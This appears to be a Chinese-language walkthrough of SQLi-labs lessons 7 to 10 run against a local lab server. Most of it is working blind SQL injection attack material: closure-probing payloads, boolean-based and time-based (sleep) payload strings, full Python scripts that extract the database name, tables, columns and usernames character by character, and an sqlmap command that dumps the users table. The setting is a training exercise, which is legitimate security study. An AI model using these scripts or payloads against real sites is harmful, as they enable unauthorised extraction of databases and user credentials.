7.
输入?id=1' --+显示格式错误
?id=1" --+正常 测试 ?id=1“ and sleep(5) --+ 发现并没有成功
?id=1') --+显示格式错误继续尝试
?id=1')) --+ 显示正常 测试 ?id=1“ and sleep(5) --+ 发现sleep执行
对于语句闭合的尝试主要从 ' " ()来测试
报错语句尝试发现不回显报错信息只会出现语法错误的信息
发现存在布尔注入
布尔注入即可以根据返回页面判断条件真假的注入
Length()函数 返回字符串的长度
Substr()截取字符串
Ascii()返回字符的ascii码
sleep(n):将程序挂起一段时间 n为n秒
if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
?id=1')) and (length(database())>7) --+ 页面正常
?id=1')) and (length(database())>8) --+ 页面报错
通过length知道了数据库长度为8
?id=1')) and (substr(database(),1,1)='s') --+
这里写一个布尔盲注脚本
使用这个脚本判读长度
import requests
def getLength():
for length in range(1, 65):
payload = f"1')) AND (LENGTH(database())>{length}) -- -"
url = f'http://192.168.1.200:86/Less-7/?id={payload}'
rsp = requests.get(url)
if 'You have an' in rsp.text:
print('长度:', length)
break
getLength()
def databasename():
database_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1')) AND (ASCII(SUBSTR(database(), {len(database_name) + 1}, 1))={ord(char)}) --+ "
url = f'http://192.168.1.200:86/Less-7/?id={payload}'
rsp = requests.get(url)
if 'You are in' in rsp.text:
database_name += char
print('数据库名:', database_name)
break
else:
break # 如果没有找到匹配的字符,退出循环
return database_name
database_name = databasename()
print("最终数据库名:", database_name)
?id=1')) and (substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='e') --+
通过这个语句我们可以查询表名
脚本
def tablename():
table_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1')) AND (substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),{len(table_name) + 1},1) = '{char}') --+ "
url = f'http://192.168.1.200:86/Less-7/?id={payload}'
rsp = requests.get(url)
if 'You are in' in rsp.text:
table_name += char
print('数据库名:', table_name)
break
else:
break # 如果没有找到匹配的字符,退出循环
return table_name
table_name = tablename()
print("最终数据库名:", table_name)
查字段
?id=1')) and (substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 1,1),1,1) = 'u' ) --+
def Data():
data = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1')) AND (substr((select username from security.users limit 0,1),{len(data) + 1},1) = '{char}') --+ "
url = f'http://192.168.1.200:86/Less-7/?id={payload}'
rsp = requests.get(url)
if 'You are in' in rsp.text:
data += char
print('数据:', data)
break
else:
break # 如果没有找到匹配的字符,退出循环
return data
data = Data()
print("最终数据:", data)
总脚本
import requests
def getLength1():
for length in range(1, 65):
payload = f"1')) AND (LENGTH(database())>{length}) -- -"
url = f'http://192.168.1.200:86/Less-7/?id={payload}'
rsp = requests.get(url)
if 'You have an' in rsp.text:
print('长度:', length)
break
getLength1()
def databasename():
database_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1')) AND (ASCII(SUBSTR(database(), {len(database_name) + 1}, 1))={ord(char)}) --+ "
url = f'http://192.168.1.200:86/Less-7/?id={payload}'
rsp = requests.get(url)
if 'You are in' in rsp.text:
database_name += char
print('数据库名:', database_name)
break
else:
break # 如果没有找到匹配的字符,退出循环
return database_name
database_name = databasename()
print("最终数据库名:", database_name)
def getTableLength():
for length in range(1, 65):
payload = f"1')) AND (LENGTH(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1), 1)) > {length}) --+"
url = f'http://192.168.1.200:86/Less-7/?id={payload}'
rsp = requests.get(url)
if 'You have an' in rsp.text:
print('表名长度:', length)
break
getTableLength()
def tablename():
table_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1')) AND (substr((select table_name from information_schema.tables where table_schema = 'security' limit 1,1),{len(table_name) + 1},1) = '{char}') --+ "
url = f'http://192.168.1.200:86/Less-7/?id={payload}'
rsp = requests.get(url)
if 'You are in' in rsp.text:
table_name += char
print('表名:', table_name)
break
else:
break # 如果没有找到匹配的字符,退出循环
return table_name
table_name = tablename()
print("最终表名:", table_name)
def columnname():
column_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1')) AND (substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 1,1),{len(column_name) + 1},1) = '{char}') --+ "
url = f'http://192.168.1.200:86/Less-7/?id={payload}'
rsp = requests.get(url)
if 'You are in' in rsp.text:
column_name += char
print('列名:', column_name)
break
else:
break # 如果没有找到匹配的字符,退出循环
return column_name
column_name = columnname()
print("最终列名:", column_name)
def Data():
data = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1')) AND (substr((select username from security.users limit 0,1),{len(data) + 1},1) = '{char}') --+ "
url = f'http://192.168.1.200:86/Less-7/?id={payload}'
rsp = requests.get(url)
if 'You are in' in rsp.text:
data += char
print('数据:', data)
break
else:
break # 如果没有找到匹配的字符,退出循环
return data
data = Data()
print("最终数据:", data)
sqlamp
└─# sqlmap -u "http://192.168.1.200:86/Less-7/?id=1" --batch -D security -t users --dump
8.
?id=1' --+正常
sleep正常执行,与上面而言输入错误不会出现提示,还是布尔型注入
def databasename():
database_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' AND (SUBSTR(database(), {len(database_name) + 1}, 1)='{char}') --+ "
url = f'http://192.168.1.200:86/Less-8/?id={payload}'
rsp = requests.get(url)
if 'You are in' in rsp.text:
database_name += char
print('数据库名:', database_name)
break
else:
break # 如果没有找到匹配的字符,退出循环
return database_name
database_name = databasename()
脚本就改个url地址和闭合方式
import requests
def getLength1():
for length in range(1, 65):
payload = f"1' AND (LENGTH(database())>{length}) -- -"
url = f'http://192.168.1.200:86/Less-8/?id={payload}'
rsp = requests.get(url)
if 'You have an' in rsp.text:
print('长度:', length)
break
getLength1()
def databasename():
database_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' AND (SUBSTR(database(), {len(database_name) + 1}, 1)='{char}') --+ "
url = f'http://192.168.1.200:86/Less-8/?id={payload}'
rsp = requests.get(url)
if 'You are in' in rsp.text:
database_name += char
print('数据库名:', database_name)
break
else:
break # 如果没有找到匹配的字符,退出循环
return database_name
database_name = databasename()
print("最终数据库名:", database_name)
def getTableLength():
for length in range(1, 65):
payload = f"1' AND (LENGTH(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1), 1)) > {length}) --+"
url = f'http://192.168.1.200:86/Less-8/?id={payload}'
rsp = requests.get(url)
if 'You have an' in rsp.text:
print('表名长度:', length)
break
getTableLength()
def tablename():
table_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' AND (substr((select table_name from information_schema.tables where table_schema = 'security' limit 1,1),{len(table_name) + 1},1) = '{char}') --+ "
url = f'http://192.168.1.200:86/Less-8/?id={payload}'
rsp = requests.get(url)
if 'You are in' in rsp.text:
table_name += char
print('数据表名:', table_name)
break
else:
break # 如果没有找到匹配的字符,退出循环
return table_name
table_name = tablename()
print("最终表名:", table_name)
def columnname():
column_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' AND (substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 1,1),{len(column_name) + 1},1) = '{char}') --+ "
url = f'http://192.168.1.200:86/Less-8/?id={payload}'
rsp = requests.get(url)
if 'You are in' in rsp.text:
column_name += char
print('数据列名:', column_name)
break
else:
break # 如果没有找到匹配的字符,退出循环
return column_name
column_name = columnname()
print("最终列名:", column_name)
def Data():
data = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' AND (substr((select username from security.users limit 0,1),{len(data) + 1},1) = '{char}') --+ "
url = f'http://192.168.1.200:86/Less-8/?id={payload}'
rsp = requests.get(url)
if 'You are in' in rsp.text:
data += char
print('数据:', data)
break
else:
break # 如果没有找到匹配的字符,退出循环
return data
data = Data()
print("最终数据:", data)
9.
可以看到不管输入了什么内容返回的都是一句话,布尔注入就用不了了,尝试sleep注入
发现sleep可以执行
通过三元运算符即substr(database(),1,1)='s'如果为true执行sleep 反之返回0
通过对值为a和s页面不同的响应速度我们得到第一个为s
import requests,time
def database():
database_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr(database(),{len(database_name) + 1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-9/?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
database_name += char
print(f"数据库名称为:{database_name}")
break
else:
break
return database_name
datas = database()
print("最终数据库名称为:",datas)
同理测试名表的语句
?id=1' and if(substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='a',sleep(5),0) --+
?id=1' and if(substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='e',sleep(5),0) --+
def tablename():
table_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),{len(table_name) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-9/?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
table_name += char
print(f"表名称为:{table_name}")
break
else:
break
return table_name
tbales = tablename()
print("最终表名称为:",tbales)
爆破列的语句
?id=1' and if(substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 0,1),1,1)='a',sleep(5),0)--+
?id=1' and if(substr((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'users' limit 0,1),1,1)='i',sleep(5),0)--+
def columnname():
column_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),{len(column_name ) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-9/?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
column_name += char
print(f"列名称为:{column_name}")
break
else:
break
return column_name
columns = columnname()
print("最终列名称为:",columns)
爆破数据
?id=1' and if(substr((select username from security.users limit 0,1),1,1)='a',sleep(5),0) --+
?id=1' and if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0) --+
def data():
data = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-9/?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
data += char
print(f"数据为:{data}")
break
else:
break
return data
datas = data()
print("最终数据为:",datas)
总脚本
import requests,time
def database():
database_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr(database(),{len(database_name) + 1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-9/?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
database_name += char
print(f"数据库名称为:{database_name}")
break
else:
break
return database_name
datas = database()
print("最终数据库名称为:",datas)
def tablename():
table_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),{len(table_name) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-9/?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
table_name += char
print(f"表名称为:{table_name}")
break
else:
break
return table_name
tbales = tablename()
print("最终表名称为:",tbales)
def columnname():
column_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),{len(column_name ) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-9/?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
column_name += char
print(f"列名称为:{column_name}")
break
else:
break
return column_name
columns = columnname()
print("最终列名称为:",columns)
def data():
data = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-9/?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
data += char
print(f"数据为:{data}")
break
else:
break
return data
datas = data()
print("最终数据为:",datas)
10.
闭合方式不同
/?id=1"and sleep(5) --+
def data():
data = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f'1" and if(substr((select username from security.users limit 0,1),{len(data) +1},1)="{char}",sleep(2),0) --+'
url = f"http://192.168.1.200:86/Less-10/?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
data += char
print(f"数据为:{data}")
break
else:
break
return data
datas = data()
print("最终数据为:",datas)